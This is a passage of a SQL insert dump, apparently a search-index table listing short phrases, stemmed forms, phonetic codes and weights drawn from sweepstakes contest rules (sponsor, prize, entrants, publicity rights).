express',0,1,1.4,'O52162',1,'en'),(27632,'on and all','on and all',0,1,1.3333,'O534',1,'en'),(27633,'on any','on any',0,1,1.2,'O500',1,'en'),(27634,'on any prize','on any prize',0,1,1.4,'O5162',1,'en'),(27635,'on his','on his',0,1,1.2,'O520',1,'en'),(27636,'on his her','on his her',0,1,1.3333,'O526',1,'en'),(27637,'on july','on july',0,1,1.2333,'O524',1,'en'),(27638,'on july 12','on july 12',0,1,1.3333,'O524',1,'en'),(27639,'on once','on once',0,1,1.2333,'O520',1,'en'),(27640,'on once the','on once the',0,1,1.3667,'O523',1,'en'),(27641,'on or','on or',0,1,1.1667,'O560',1,'en'),(27642,'on or that','on or that',0,1,1.3333,'O563',1,'en'),(27643,'on publicity','on publicity',0,1,1.4,'O51423',1,'en'),(27644,'on publicity rights','on publicity rights',0,1,1.6333,'O514236232',1,'en'),(27645,'on sponsor','on sponsor',0,1,1.3333,'O521526',1,'en'),(27646,'on sponsor a','on sponsor a',0,1,1.4,'O521526',1,'en'),(27647,'on the amount','on the amount',0,1,1.4333,'O5353',1,'en'),(27648,'on the information','on the information',0,1,1.6,'O53516535',1,'en'),(27649,'on the part','on the part',0,1,1.3667,'O53163',1,'en'),(27650,'on the prize','on the prize',0,1,1.4,'O53162',1,'en'),(27651,'on the promotion','on the promotion',0,1,1.5333,'O5316535',1,'en'),(27652,'once the','onc the',0,1,1.2667,'O523',1,'en'),(27653,'once the gift','onc the gift',0,1,1.4333,'O523213',1,'en'),(27654,'once the possible','onc the possible',0,1,1.5667,'O5231214',1,'en'),(27655,'one 1','on 1',0,1,1.1667,'O500',1,'en'),(27656,'one 1 entry','on 1 entry',0,1,1.3667,'O536',1,'en'),(27657,'one 1 prize','on 1 prize',0,1,1.3667,'O5162',1,'en'),(27658,'one 1 victorious','on 1 victorious',0,1,1.5333,'O512362',1,'en'),(27659,'one entries','on entries',0,1,1.3667,'O5362',1,'en'),(27660,'one entries entry','on entries entry',0,1,1.5667,'O5362536',1,'en'),(27661,'one year','on year',0,1,1.2667,'O560',1,'en'),(27662,'one year replicated','on year replicated',0,1,1.6333,'O561423',1,'en'),(27663,'ones','on',0,0,0.2667,'O520',1,'en'),(27664,'ones reps','on reps',0,1,1.3,'O52612',1,'en'),(27665,'ones reps solutions','on reps solutions',0,1,1.6333,'O526124352',1,'en'),(27666,'only all','onli all',0,1,1.2667,'O540',1,'en'),(27667,'only all country','onli all country',0,1,1.5333,'O542536',1,'en'),(27668,'operation of','oper of',0,1,1.4,'O16351',1,'en'),(27669,'operation of the','oper of the',0,1,1.5333,'O163513',1,'en'),(27670,'opt','opt',0,0,0.2,'O130',1,'en'),(27671,'opt out','opt out',0,1,1.2333,'O130',1,'en'),(27672,'opt out instructions','opt out instructions',0,1,1.6667,'O1352362352',1,'en'),(27673,'opt out of','opt out of',0,1,1.3333,'O131',1,'en'),(27674,'or above','or above',0,1,1.2667,'O610',1,'en'),(27675,'or above 600.no','or above 600.no',0,1,1.5,'O615',1,'en'),(27676,'or affidavit','or affidavit',0,1,1.4,'O61313',1,'en'),(27677,'or affidavit is','or affidavit is',0,1,1.5,'O613132',1,'en'),(27678,'or announcements','or announcements',0,1,1.5333,'O652532',1,'en'),(27679,'or announcements that','or announcements that',0,1,1.7,'O6525323',1,'en'),(27680,'or another','or another',0,1,1.3333,'O6536',1,'en'),(27681,'or another winner','or another winner',0,1,1.5667,'O653656',1,'en'),(27682,'or any','or any',0,1,1.2,'O650',1,'en'),(27683,'or any organizations','or any organizations',0,1,1.6667,'O656252352',1,'en'),(27684,'or any promotion','or any promotion',0,1,1.5333,'O6516535',1,'en'),(27685,'or approval','or approval',0,1,1.3667,'O61614',1,'en'),(27686,'or approval to','or approval to',0,1,1.4667,'O616143',1,'en'),(27687,'or arising','or arising',0,1,1.3333,'O6252',1,'en'),(27688,'or arising out','or arising out',0,1,1.4667,'O62523',1,'en'),(27689,'or attempting','or attempting',0,1,1.4333,'O6351352',1,'en'),(27690,'or attempting to','or attempting to',0,1,1.5333,'O63513523',1,'en'),(27691,'or automated','or automated',0,1,1.4,'O6353',1,'en'),(27692,'or automated devices','or automated devices',0,1,1.6667,'O635312',1,'en'),(27693,'or by','or by',0,1,1.1667,'O610',1,'en'),(27694,'or by any','or by any',0,1,1.3,'O615',1,'en'),(27695,'or cash','or cash',0,1,1.2333,'O620',1,'en'),(27696,'or cash counterpart','or cash counterpart',0,1,1.6333,'O62536163',1,'en'),(27697,'or caused','or caused',0,1,1.3,'O623',1,'en'),(27698,'or caused by','or caused by',0,1,1.4,'O6231',1,'en'),(27699,'or causes','or causes',0,1,1.3,'O620',1,'en'),(27700,'or causes of','or causes of',0,1,1.4,'O621',1,'en'),(27701,'or claiming','or claiming',0,1,1.3667,'O62452',1,'en'),(27702,'or claiming the','or claiming the',0,1,1.5,'O624523',1,'en'),(27703,'or computer','or computer',0,1,1.3667,'O625136',1,'en'),(27704,'or computer does','or computer does',0,1,1.5333,'O62513632',1,'en'),(27705,'or confined','or confined',0,1,1.3667,'O625153',1,'en'),(27706,'or confined by','or confined by',0,1,1.4667,'O6251531',1,'en'),(27707,'or conflict','or conflict',0,1,1.3667,'O6251423',1,'en'),(27708,'or conflict of','or conflict of',0,1,1.4667,'O62514231',1,'en'),(27709,'or court','or court',0,1,1.2667,'O6263',1,'en'),(27710,'or court performs','or court performs',0,1,1.5667,'O6263161652',1,'en'),(27711,'or criteria','or criteria',0,1,1.3667,'O62636',1,'en'),(27712,'or criteria simply','or criteria simply',0,1,1.6,'O626362514',1,'en'),(27713,'or damage','or damage',0,1,1.3,'O6352',1,'en'),(27714,'or damage to','or damage to',0,1,1.4,'O63523',1,'en'),(27715,'or death','or death',0,1,1.2667,'O630',1,'en'),(27716,'or death which','or death which',0,1,1.4667,'O632',1,'en'),(27717,'or deception','or deception',0,1,1.4,'O632135',1,'en'),(27718,'or deception in','or deception in',0,1,1.5,'O632135',1,'en'),(27719,'or dilemmas','or dilemmas',0,1,1.3667,'O63452',1,'en'),(27720,'or dilemmas agouritorito','or dilemmas agouritorito',0,1,1.8,'O634526363',1,'en'),(27721,'or disruptions','or disruptions',0,1,1.4667,'O63261352',1,'en'),(27722,'or disruptions due','or disruptions due',0,1,1.6,'O632613523',1,'en'),(27723,'or do','or do',0,1,1.1667,'O630',1,'en'),(27724,'or do not','or do not',0,1,1.3,'O6353',1,'en'),(27725,'or does','or does',0,1,1.2333,'O632',1,'en'),(27726,'or does not','or does not',0,1,1.3667,'O63253',1,'en'),(27727,'or downloading','or downloading',0,1,1.4667,'O6354352',1,'en'),(27728,'or downloading materials','or downloading materials',0,1,1.8,'O635435253642',1,'en'),(27729,'or engagement','or engagement',0,1,1.4333,'O65253',1,'en'),(27730,'or engagement in','or engagement in',0,1,1.5333,'O652535',1,'en'),(27731,'or engaging','or engaging',0,1,1.3667,'O65252',1,'en'),(27732,'or engaging in','or engaging in',0,1,1.4667,'O652525',1,'en'),(27733,'or expense','or expense',0,1,1.3333,'O62152',1,'en'),(27734,'or expense the','or expense the',0,1,1.4667,'O621523',1,'en'),(27735,'or federal','or federal',0,1,1.3333,'O61364',1,'en'),(27736,'or federal court','or federal court',0,1,1.5333,'O61364263',1,'en'),(27737,'or greater','or greater',0,1,1.3333,'O62636',1,'en'),(27738,'or greater value','or greater value',0,1,1.5333,'O6263614',1,'en'),(27739,'or guidance','or guidance',0,1,1.3667,'O62352',1,'en'),(27740,'or guidance in','or guidance in',0,1,1.4667,'O623525',1,'en'),(27741,'or hereafter','or hereafter',0,1,1.4,'O6136',1,'en'),(27742,'or hereafter created','or hereafter created',0,1,1.6667,'O6136263',1,'en'),(27743,'or hereafter made','or hereafter made',0,1,1.5667,'O613653',1,'en'),(27744,'or home','or home',0,1,1.2333,'O650',1,'en'),(27745,'or home mailing','or home mailing',0,1,1.5,'O65452',1,'en'),(27746,'or in','or in',0,1,1.1667,'O650',1,'en'),(27747,'or in law','or in law',0,1,1.3,'O654',1,'en'),(27748,'or in part','or in part',0,1,1.3333,'O65163',1,'en'),(27749,'or intended','or intended',0,1,1.3667,'O65353',1,'en'),(27750,'or intended truly','or intended truly',0,1,1.5667,'O6535364',1,'en'),(27751,'or invasion','or invasion',0,1,1.3667,'O65125',1,'en'),(27752,'or invasion of','or invasion of',0,1,1.4667,'O651251',1,'en'),(27753,'or its','or its',0,1,1.2,'O632',1,'en'),(27754,'or its own','or its own',0,1,1.3333,'O6325',1,'en'),(27755,'or lack','or lack',0,1,1.2333,'O642',1,'en'),(27756,'or lack of','or lack of',0,1,1.3333,'O6421',1,'en'),(27757,'or liable','or liable',0,1,1.3,'O6414',1,'en'),(27758,'or liable for','or liable for',0,1,1.4333,'O641416',1,'en'),(27759,'or likeness','or likeness',0,1,1.3667,'O64252',1,'en'),(27760,'or likeness of','or likeness of',0,1,1.4667,'O642521',1,'en'),(27761,'or losses','or losses',0,1,1.3,'O642',1,'en'),(27762,'or losses of','or losses of',0,1,1.4,'O6421',1,'en'),(27763,'or makes','or makes',0,1,1.2667,'O652',1,'en'),(27764,'or makes sure','or makes sure',0,1,1.4333,'O6526',1,'en'),(27765,'or misdirection','or misdirection',0,1,1.5,'O65236235',1,'en'),(27766,'or misdirection of','or misdirection of',0,1,1.6,'O652362351',1,'en'),(27767,'or misuse','or misuse',0,1,1.3,'O652',1,'en'),(27768,'or misuse of','or misuse of',0,1,1.4,'O6521',1,'en'),(27769,'or modify','or modify',0,1,1.3,'O6531',1,'en'),(27770,'or modify the','or modify the',0,1,1.4333,'O65313',1,'en'),(27771,'or not','or not',0,1,1.2,'O653',1,'en'),(27772,'or not robotically','or not robotically',0,1,1.6,'O65361324',1,'en'),(27773,'or older','or older',0,1,1.2667,'O6436',1,'en'),(27774,'or older or','or older or',0,1,1.3667,'O6436',1,'en'),(27775,'or other','or other',0,1,1.2667,'O636',2,'en'),(27776,'or other jurisdiction','or other jurisdiction',0,1,1.7,'O6362623235',1,'en'),(27777,'or other likenesses','or other likenesses',0,1,1.6333,'O6364252',1,'en'),(27778,'or other similar','or other similar',0,1,1.5333,'O6362546',1,'en'),(27779,'or partners','or partners',0,1,1.3667,'O6163562',1,'en'),(27780,'or partners no','or partners no',0,1,1.4667,'O61635625',1,'en'),(27781,'or payment','or payment',0,1,1.3333,'O6153',1,'en'),(27782,'or payment cheap','or payment cheap',0,1,1.5333,'O615321',1,'en'),(27783,'or payment of','or payment of',0,1,1.4333,'O61531',1,'en'),(27784,'or perhaps a','or perhaps a',0,1,1.4,'O61612',1,'en'),(27785,'or perhaps not','or perhaps not',0,1,1.4667,'O6161253',1,'en'),(27786,'or person','or person',0,1,1.3,'O61625',1,'en'),(27787,'or person acceptance','or person acceptance',0,1,1.6667,'O6162521352',1,'en'),(27788,'or possessions','or possessions',0,1,1.4667,'O61252',1,'en'),(27789,'or possessions who','or possessions who',0,1,1.6,'O61252',1,'en'),(27790,'or prior','or prior',0,1,1.2667,'O616',1,'en'),(27791,'or prior to','or prior to',0,1,1.3667,'O6163',1,'en'),(27792,'or prize','or prize',0,1,1.2667,'O6162',1,'en'),(27793,'or prize evidence','or prize evidence',0,1,1.5667,'O61621352',1,'en'),(27794,'or prize related','or prize related',0,1,1.5333,'O6162643',1,'en'),(27795,'or promoting','or promoting',0,1,1.4,'O6165352',1,'en'),(27796,'or promoting the','or promoting the',0,1,1.5333,'O61653523',1,'en'),(27797,'or promotion','or promotion',0,1,1.4,'O616535',1,'en'),(27798,'or promotion for','or promotion for',0,1,1.5333,'O61653516',1,'en'),(27799,'or promotion on','or promotion on',0,1,1.5,'O616535',1,'en'),(27800,'or publish','or publish',0,1,1.3333,'O6142',1,'en'),(27801,'or publish his','or publish his',0,1,1.4667,'O6142',1,'en'),(27802,'or publish winner','or publish winner',0,1,1.5667,'O614256',1,'en'),(27803,'or receive','or receive',0,1,1.3333,'O621',1,'en'),(27804,'or receive the','or receive the',0,1,1.4667,'O6213',1,'en'),(27805,'or reference','or reference',0,1,1.4,'O61652',1,'en'),(27806,'or reference in','or reference in',0,1,1.5,'O616525',1,'en'),(27807,'or replacing','or replacing',0,1,1.4,'O614252',1,'en'),(27808,'or replacing of','or replacing of',0,1,1.5,'O6142521',1,'en'),(27809,'or reproduced','or reproduced',0,1,1.4333,'O616323',1,'en'),(27810,'or reproduced entries','or reproduced entries',0,1,1.7,'O6163235362',1,'en'),(27811,'or responsibilities','or responsibilities',0,1,1.6333,'O621521432',1,'en'),(27812,'or responsibilities including','or responsibilities including',0,1,1.9667,'O621521432524352',1,'en'),(27813,'or resulting','or resulting',0,1,1.4,'O624352',1,'en'),(27814,'or resulting from','or resulting from',0,1,1.5667,'O624352165',1,'en'),(27815,'or returned','or returned',0,1,1.3667,'O63653',1,'en'),(27816,'or returned regulations','or returned regulations',0,1,1.7667,'O63653624352',1,'en'),(27817,'or select','or select',0,1,1.3,'O62423',1,'en'),(27818,'or select winner','or select winner',0,1,1.5333,'O6242356',1,'en'),(27819,'or software','or software',0,1,1.3667,'O62136',1,'en'),(27820,'or software in','or software in',0,1,1.4667,'O621365',1,'en'),(27821,'or sponsor','or sponsor',0,1,1.3333,'O621526',1,'en'),(27822,'or sponsor regarding','or sponsor regarding',0,1,1.6667,'O62152626352',1,'en'),(27823,'or sponsor worldwide','or sponsor worldwide',0,1,1.6667,'O62152643',1,'en'),(27824,'or statements','or statements',0,1,1.4333,'O623532',1,'en'),(27825,'or statements made','or statements made',0,1,1.6,'O62353253',1,'en'),(27826,'or stolen','or stolen',0,1,1.3,'O62345',1,'en'),(27827,'or stolen american','or stolen american',0,1,1.6,'O62345625',1,'en'),(27828,'or supplying','or supplying',0,1,1.4,'O621452',1,'en'),(27829,'or supplying any','or supplying any',0,1,1.5333,'O6214525',1,'en'),(27830,'or technical','or technical',0,1,1.4,'O632524',1,'en'),(27831,'or technical error','or technical error',0,1,1.6,'O6325246',1,'en'),(27832,'or terminate','or terminate',0,1,1.4,'O63653',1,'en'),(27833,'or terminate the','or terminate the',0,1,1.5333,'O63653',1,'en'),(27834,'or territorial','or territorial',0,1,1.4667,'O636364',1,'en'),(27835,'or territorial protocols','or territorial protocols',0,1,1.8,'O636364163242',1,'en'),(27836,'or territory','or territory',0,1,1.4,'O63636',1,'en'),(27837,'or territory of','or territory of',0,1,1.5,'O636361',1,'en'),(27838,'or that','or that',0,1,1.2333,'O630',1,'en'),(27839,'or that is','or that is',0,1,1.3333,'O632',1,'en'),(27840,'or the age','or the age',0,1,1.3333,'O632',1,'en'),(27841,'or the net','or the net',0,1,1.3333,'O6353',1,'en'),(27842,'or the operation','or the operation',0,1,1.5333,'O631635',1,'en'),(27843,'or the rights','or the rights',0,1,1.4333,'O636232',1,'en'),(27844,'or the use','or the use',0,1,1.3333,'O632',1,'en'),(27845,'or their','or their',0,1,1.2667,'O636',1,'en'),(27846,'or their affiliates','or their affiliates',0,1,1.6333,'O6361432',1,'en'),(27847,'or to any','or to any',0,1,1.3,'O635',1,'en'),(27848,'or unclaimed','or unclaimed',0,1,1.4,'O652453',1,'en'),(27849,'or unclaimed and','or unclaimed and',0,1,1.5333,'O65245353',1,'en'),(27850,'or unforeseen','or unforeseen',0,1,1.4333,'O651625',1,'en'),(27851,'or unforeseen events','or unforeseen events',0,1,1.6667,'O6516251532',1,'en'),(27852,'or unused','or unused',0,1,1.3,'O6523',1,'en'),(27853,'or unused by','or unused by',0,1,1.4,'O65231',1,'en'),(27854,'or use','or use',0,1,1.2,'O620',1,'en'),(27855,'or use or','or use or',0,1,1.3,'O626',1,'en'),(27856,'or viability','or viability',0,1,1.4,'O6143',1,'en'),(27857,'or viability of','or viability of',0,1,1.5,'O61431',1,'en'),(27858,'or violate','or violate',0,1,1.3333,'O6143',1,'en'),(27859,'or violate the','or violate the',0,1,1.4667,'O6143',1,'en'),(27860,'or win','or win',0,1,1.2,'O650',1,'en'),(27861,'or win the','or win the',0,1,1.3333,'O653',1,'en'),(27862,'or win void','or win void',0,1,1.3667,'O6513',1,'en'),(27863,'or with','or with',0,1,1.2333,'O630',1,'en'),(27864,'or with any','or with any',0,1,1.3667,'O635',1,'en'),(27865,'or within','or within',0,1,1.3,'O635',1,'en'),(27866,'or within any','or within any',0,1,1.4333,'O635',1,'en'),(27867,'or world-wide-web','or world-wide-web',0,1,1.5667,'O6431',1,'en'),(27868,'or world-wide-web without','or world-wide-web without',0,1,1.8333,'O64313',1,'en'),(27869,'order to cancel','order to cancel',0,1,1.5,'O63632524',1,'en'),(27870,'order to enter','order to enter',0,1,1.4667,'O6363536',1,'en'),(27871,'organizations','organ',0,0,0.8667,'O6252352',3,'en'),(27872,'organizations regarding','organ regarding',0,1,1.7667,'O6252352626352',1,'en'),(27873,'organizations regarding fulfilling','organ regarding fulfilling',0,1,2,'O6252352626352141452',1,'en'),(27874,'other certification','other certification',0,1,1.6333,'O362631235',1,'en'),(27875,'other certification that','other certification that',0,1,1.8,'O3626312353',1,'en'),(27876,'other countries areas','other countries areas',0,1,1.7,'O362536262',1,'en'),(27877,'other expenses','other expenses',0,1,1.4667,'O362152',1,'en'),(27878,'other expenses not','other expenses not',0,1,1.6,'O36215253',1,'en'),(27879,'other forms','other forms',0,1,1.3667,'O361652',1,'en'),(27880,'other forms that','other forms that',0,1,1.5333,'O3616523',1,'en'),(27881,'other jurisdiction','other jurisdiction',0,1,1.6,'O362623235',1,'en'),(27882,'other jurisdiction which','other jurisdiction which',0,1,1.8,'O3626232352',1,'en'),(27883,'other likenesses','other likenesses',0,1,1.5333,'O364252',1,'en'),(27884,'other likenesses photographs','other likenesses photographs',0,1,1.9333,'O364252132612',1,'en'),(27885,'other person','other person',0,1,1.4,'O361625',1,'en'),(27886,'other person computer','other person computer',0,1,1.7,'O36162525136',1,'en'),(27887,'other similar','other similar',0,1,1.4333,'O362546',1,'en'),(27888,'other similar event','other similar event',0,1,1.6333,'O362546153',1,'en'),(27889,'other than','other than',0,1,1.3333,'O3635',1,'en'),(27890,'other than as','other than as',0,1,1.4333,'O36352',1,'en'),(27891,'other than the','other than the',0,1,1.4667,'O36353',1,'en'),(27892,'out instructions','out instructions',0,1,1.5333,'O352362352',1,'en'),(27893,'out instructions contained','out instructions contained',0,1,1.8667,'O3523623525353',1,'en'),(27894,'out of receiving','out of receiving',0,1,1.5333,'O3162152',1,'en'),(27895,'over the limits','over the limits',0,1,1.5,'O1634532',1,'en'),(27896,'over the subject','over the subject',0,1,1.5333,'O1632123',1,'en'),(27897,'own parents','own parents',0,1,1.3667,'O516532',1,'en'),(27898,'own parents subsidiaries','own parents subsidiaries',0,1,1.8,'O51653212362',1,'en'),(27899,'owners','owner',0,0,0.4,'O562',1,'en'),(27900,'owners from','owner from',0,1,1.3667,'O562165',1,'en'),(27901,'owners from any','owner from any',0,1,1.5,'O562165',1,'en'),(27902,'pa','pa',0,0,0.1333,'P000',1,'en'),(27903,'pa entrants','pa entrants',0,1,1.3667,'P536532',1,'en'),(27904,'pa entrants hereby','pa entrants hereby',0,1,1.6,'P53653261',1,'en'),(27905,'parent','parent',0,0,0.4,'P653',1,'en'),(27906,'parent companies','parent companies',0,1,1.5333,'P65325152',1,'en'),(27907,'parent companies subsidiaries','parent companies subsidiaries',0,1,1.9667,'P6532515212362',1,'en'),(27908,'parent legal','parent legal',0,1,1.4,'P653424',1,'en'),(27909,'parent legal guardian','parent legal guardian',0,1,1.7,'P6534242635',1,'en'),(27910,'parent producers','parent producers',0,1,1.5333,'P653163262',1,'en'),(27911,'parent producers subsidiaries','parent producers subsidiaries',0,1,1.9667,'P65316326212362',1,'en'),(27912,'parent solutions','parent solutions',0,1,1.5333,'P65324352',1,'en'),(27913,'parent solutions subsidiaries','parent solutions subsidiaries',0,1,1.9667,'P6532435212362',1,'en'),(27914,'parents','parent',0,0,0.4667,'P6532',1,'en'),(27915,'parents subsidiaries','parent subsidiaries',0,1,1.6667,'P653212362',1,'en'),(27916,'parents subsidiaries affiliates','parent subsidiaries affiliates',0,1,2,'P6532123621432',1,'en'),(27917,'part and','part and',0,1,1.2667,'P6353',1,'en'),(27918,'part and or','part and or',0,1,1.3667,'P63536',1,'en'),(27919,'part due','part due',0,1,1.2667,'P630',1,'en'),(27920,'part due to','part due to',0,1,1.3667,'P630',1,'en'),(27921,'part of sponsor','part of sponsor',0,1,1.5,'P63121526',1,'en'),(27922,'part of the','part of the',0,1,1.3667,'P6313',3,'en'),(27923,'part worldwide','part worldwide',0,1,1.4667,'P63643',1,'en'),(27924,'part worldwide and','part worldwide and',0,1,1.6,'P6364353',1,'en'),(27925,'particular per','particular per',0,1,1.4667,'P6324616',1,'en'),(27926,'particular per e','particular per e',0,1,1.5333,'P6324616',1,'en'),(27927,'parties','parti',0,0,0.4667,'P632',1,'en'),(27928,'parties other','parti other',0,1,1.4333,'P63236',1,'en'),(27929,'parties other than','parti other than',0,1,1.6,'P6323635',1,'en'),(27930,'partners no','partner no',0,1,1.3667,'P635625',1,'en'),(27931,'partners no matter','partner no matter',0,1,1.6,'P63562536',1,'en'),(27932,'party','parti',0,0,0.3333,'P630',3,'en'),(27933,'party sponsor','parti sponsor',0,1,1.4333,'P6321526',1,'en'),(27934,'party sponsor uses','parti sponsor uses',0,1,1.6,'P63215262',1,'en'),(27935,'pattern','pattern',0,0,0.4667,'P365',2,'en'),(27936,'pattern tv','pattern tv',0,1,1.3333,'P36531',1,'en'),(27937,'pattern tv set','pattern tv set',0,1,1.4667,'P3653123',1,'en'),(27938,'pay plans','pai plans',0,1,1.3,'P452',1,'en'),(27939,'pay plans take','pai plans take',0,1,1.4667,'P45232',1,'en'),(27940,'payment','payment',0,0,0.4667,'P530',1,'en'),(27941,'payment cheap','payment cheap',0,1,1.4333,'P5321',1,'en'),(27942,'payment cheap ralph','payment cheap ralph',0,1,1.6333,'P5321641',1,'en'),(27943,'payment of','payment of',0,1,1.3333,'P531',1,'en'),(27944,'payment of any','payment of any',0,1,1.4667,'P5315',1,'en'),(27945,'pennsylvania','pennsylvania',0,0,0.8,'P52415',1,'en'),(27946,'pennsylvania as','pennsylvania as',0,1,1.5,'P524152',1,'en'),(27947,'pennsylvania as an','pennsylvania as an',0,1,1.6,'P5241525',1,'en'),(27948,'people unless','peopl unless',0,1,1.4333,'P4542',1,'en'),(27949,'people unless a','peopl unless a',0,1,1.5,'P4542',1,'en'),(27950,'people who','peopl who',0,1,1.3333,'P400',4,'en'),(27951,'people who share','peopl who share',0,1,1.5333,'P426',1,'en'),(27952,'per day','per day',0,1,1.2333,'P630',1,'en'),(27953,'per day on','per day on',0,1,1.3333,'P635',1,'en'),(27954,'per e','per e',0,1,1.1667,'P600',1,'en'),(27955,'per e mail','per e mail',0,1,1.3333,'P654',1,'en'),(27956,'per particular','per particular',0,1,1.4667,'P6163246',1,'en'),(27957,'per particular per','per particular per',0,1,1.6,'P616324616',1,'en'),(27958,'performs entrants','perform entrants',0,1,1.5667,'P61652536532',1,'en'),(27959,'performs entrants information','perform entrants information',0,1,1.9667,'P61652536532516535',1,'en'),(27960,'perhaps a','perhap a',0,1,1.3,'P612',1,'en'),(27961,'perhaps a y','perhap a y',0,1,1.3667,'P612',1,'en'),(27962,'perhaps not','perhap not',0,1,1.3667,'P61253',2,'en'),(27963,'perhaps not received','perhap not received',0,1,1.6667,'P612536213',1,'en'),(27964,'period','period',0,0,0.4,'P630',2,'en'),(27965,'period awards','period awards',0,1,1.4333,'P63632',1,'en'),(27966,'period awards the','period awards the',0,1,1.5667,'P636323',1,'en'),(27967,'period entries','period entries',0,1,1.4667,'P635362',1,'en'),(27968,'period entries by','period entries by',0,1,1.5667,'P6353621',1,'en'),(27969,'permitted','permit',0,0,0.6,'P653',2,'en'),(27970,'permitted with','permit with',0,1,1.4667,'P653',1,'en'),(27971,'permitted with the','permit with the',0,1,1.6,'P653',1,'en'),(27972,'perpetuity','perpetu',0,0,0.6667,'P613',1,'en'),(27973,'perpetuity for','perpetu for',0,1,1.4667,'P61316',1,'en'),(27974,'perpetuity for any','perpetu for any',0,1,1.6,'P613165',1,'en'),(27975,'perpetuity for every','perpetu for every',0,1,1.6667,'P6131616',1,'en'),(27976,'person','person',0,0,0.4,'P625',3,'en'),(27977,'person acceptance','person acceptance',0,1,1.5667,'P62521352',1,'en'),(27978,'person acceptance and','person acceptance and',0,1,1.7,'P6252135253',1,'en'),(27979,'person computer','person computer',0,1,1.5,'P62525136',1,'en'),(27980,'person computer regardless','person computer regardless',0,1,1.8667,'P6252513626342',1,'en'),(27981,'person except','person except',0,1,1.4333,'P625213',1,'en'),(27982,'person except the','person except the',0,1,1.5667,'P625213',1,'en'),(27983,'person over','person over',0,1,1.3667,'P62516',1,'en'),(27984,'person over the','person over the',0,1,1.5,'P625163',1,'en'),(27985,'person s','person s',0,1,1.2667,'P6252',1,'en'),(27986,'person s is','person s is',0,1,1.3667,'P6252',1,'en'),(27987,'person\'s','person',0,0,0.5333,'P6252',1,'en'),(27988,'person\'s affidavit','person affidavit',0,1,1.6,'P62521313',1,'en'),(27989,'person\'s affidavit well','person affidavit well',0,1,1.7667,'P625213134',1,'en'),(27990,'person\'s name','person name',0,1,1.4333,'P62525',1,'en'),(27991,'person\'s name state','person name state',0,1,1.6333,'P6252523',1,'en'),(27992,'personal jurisdiction','person jurisdiction',0,1,1.7,'P62542623235',1,'en'),(27993,'personal jurisdiction they','person jurisdiction they',0,1,1.8667,'P625426232353',1,'en'),(27994,'persons officers','person officers',0,1,1.5333,'P62521262',1,'en'),(27995,'persons officers and','person officers and',0,1,1.6667,'P6252126253',1,'en'),(27996,'phone number','phone number',0,1,1.4,'P516',1,'en'),(27997,'phone number and','phone number and',0,1,1.5333,'P51653',1,'en'),(27998,'phone number or','phone number or',0,1,1.5,'P516',1,'en'),(27999,'phonephone','phonephon',0,0,0.6667,'P515',1,'en'),(28000,'phonephone electronic','phonephon electronic',0,1,1.7,'P515423652',1,'en'),(28001,'phonephone electronic digital','phonephon electronic digital',0,1,1.9667,'P5154236523234',1,'en'),(28002,'photographs','photograph',0,0,0.7333,'P32612',2,'en'),(28003,'photographs pictures','photograph pictures',0,1,1.6667,'P3261212362',1,'en'),(28004,'photographs pictures express','photograph pictures express',0,1,1.9333,'P3261212362162',1,'en'),(28005,'photos or','photo or',0,1,1.3,'P326',1,'en'),(28006,'photos or other','photo or other',0,1,1.5,'P32636',1,'en'),(28007,'pick the','pick the',0,1,1.2667,'P230',2,'en'),(28008,'pick the winner','pick the winner',0,1,1.5,'P2356',1,'en'),(28009,'pictures','pictur',0,0,0.5333,'P2362',1,'en'),(28010,'pictures express','pictur express',0,1,1.5333,'P2362162',1,'en'),(28011,'pictures express reports','pictur express reports',0,1,1.8,'P236216261632',1,'en'),(28012,'pictures speak','pictur speak',0,1,1.4667,'P236212',1,'en'),(28013,'pictures speak customer','pictur speak customer',0,1,1.7667,'P236212356',1,'en'),(28014,'place a','place a',0,1,1.2333,'P420',1,'en'),(28015,'place a burden','place a burden',0,1,1.4667,'P421635',1,'en'),(28016,'plans take','plan take',0,1,1.3333,'P45232',1,'en'),(28017,'plans take note','plan take note',0,1,1.5,'P4523253',1,'en'),(28018,'please note','pleas note',0,1,1.3667,'P4253',1,'en'),(28019,'please note of','pleas note of',0,1,1.4667,'P42531',1,'en'),(28020,'please refer','pleas refer',0,1,1.4,'P42616',1,'en'),(28021,'please refer to','pleas refer to',0,1,1.5,'P426163',1,'en'),(28022,'plus entry','plu entry',0,1,1.3333,'P42536',1,'en'),(28023,'plus entry material','plu entry material',0,1,1.6333,'P425365364',1,'en'),(28024,'points','point',0,0,0.4,'P532',2,'en'),(28025,'points to','point to',0,1,1.3,'P5323',1,'en'),(28026,'points to enter','point to enter',0,1,1.5,'P5323536',1,'en'),(28027,'policy','polici',0,0,0.4,'P420',2,'en'),(28028,'policy all','polici all',0,1,1.3333,'P424',1,'en'),(28029,'policy all entries','polici all entries',0,1,1.6,'P4245362',1,'en'),(28030,'policy for','polici for',0,1,1.3333,'P4216',1,'en'),(28031,'policy for you','polici for you',0,1,1.4667,'P4216',1,'en'),(28032,'policy merely','polici merely',0,1,1.4333,'P42564',1,'en'),(28033,'policy merely tampering','polici merely tampering',0,1,1.7667,'P42564351652',1,'en'),(28034,'portion','portion',0,0,0.4667,'P635',1,'en'),(28035,'portion of','portion of',0,1,1.3333,'P6351',1,'en'),(28036,'portion of the','portion of the',0,1,1.4667,'P63513',1,'en'),(28037,'portrayed','portrai',0,0,0.6,'P6363',1,'en'),(28038,'portrayed services','portrai services',0,1,1.6,'P63632612',1,'en'),(28039,'portrayed services for','portrai services for',0,1,1.7333,'P6363261216',1,'en'),(28040,'possessions','possess',0,0,0.7333,'P252',1,'en'),(28041,'possessions and','possess and',0,1,1.5,'P25253',1,'en'),(28042,'possessions and europe','possess and europe',0,1,1.7333,'P2525361',1,'en'),(28043,'possessions who','possess who',0,1,1.5,'P252',1,'en'),(28044,'possessions who are','possess who are',0,1,1.6333,'P2526',1,'en'),(28045,'possible','possibl',0,0,0.5333,'P214',2,'en'),(28046,'possible winner','possibl winner',0,1,1.5,'P21456',1,'en'),(28047,'possible winner has','possibl winner has',0,1,1.6333,'P214562',1,'en'),(28048,'postal','postal',0,0,0.4,'P234',1,'en'),(28049,'postal mailing','postal mailing',0,1,1.4667,'P2345452',1,'en'),(28050,'postal mailing notice','postal mailing notice',0,1,1.7,'P2345452532',1,'en'),(28051,'postmarked','postmark',0,0,0.6667,'P235623',1,'en'),(28052,'postmarked no','postmark no',0,1,1.4333,'P2356235',1,'en'),(28053,'postmarked no later','postmark no later',0,1,1.6333,'P2356235436',1,'en'),(28054,'potential winner','potenti winner',0,1,1.5333,'P353456',1,'en'),(28055,'potential winner by','potenti winner by',0,1,1.6333,'P3534561',1,'en'),(28056,'potential 